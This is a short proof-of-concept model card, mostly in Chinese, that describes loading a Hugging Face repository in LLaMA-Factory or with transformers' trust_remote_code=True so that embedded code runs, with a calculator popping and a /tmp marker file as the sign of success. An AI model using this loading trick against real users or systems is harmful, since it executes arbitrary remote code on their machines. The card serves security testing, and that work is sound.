| license: apache-2.0 | |
| tags: | |
| - poc | |
| - security-testing | |
| # Simple Malicious Model POC | |
| 简单的恶意模型 POC,使用 LlamaTokenizer。 | |
| ## 测试方法 | |
| ### 在 LLaMA-Factory WebUI | |
| 1. 切换到 Chat 标签 | |
| 2. Model name: 选择 TinyLlama-1.1B 或任意 | |
| 3. Model path: 1Teng/Deserialization_Model | |
| 4. 点击 Load Model | |
| ### Python 测试 | |
| ```python | |
| from transformers import AutoConfig, AutoTokenizer | |
| # 这会触发恶意代码 | |
| config = AutoConfig.from_pretrained( | |
| "1Teng/Deserialization_Model", | |
| trust_remote_code=True | |
| ) | |
| tokenizer = AutoTokenizer.from_pretrained( | |
| "1Teng/Deserialization_Model", | |
| trust_remote_code=True | |
| ) | |
| ``` | |
| ## 验证 | |
| - 计算器自动打开 = 成功 | |
| - 查看: /tmp/llama_poc_executed.txt | |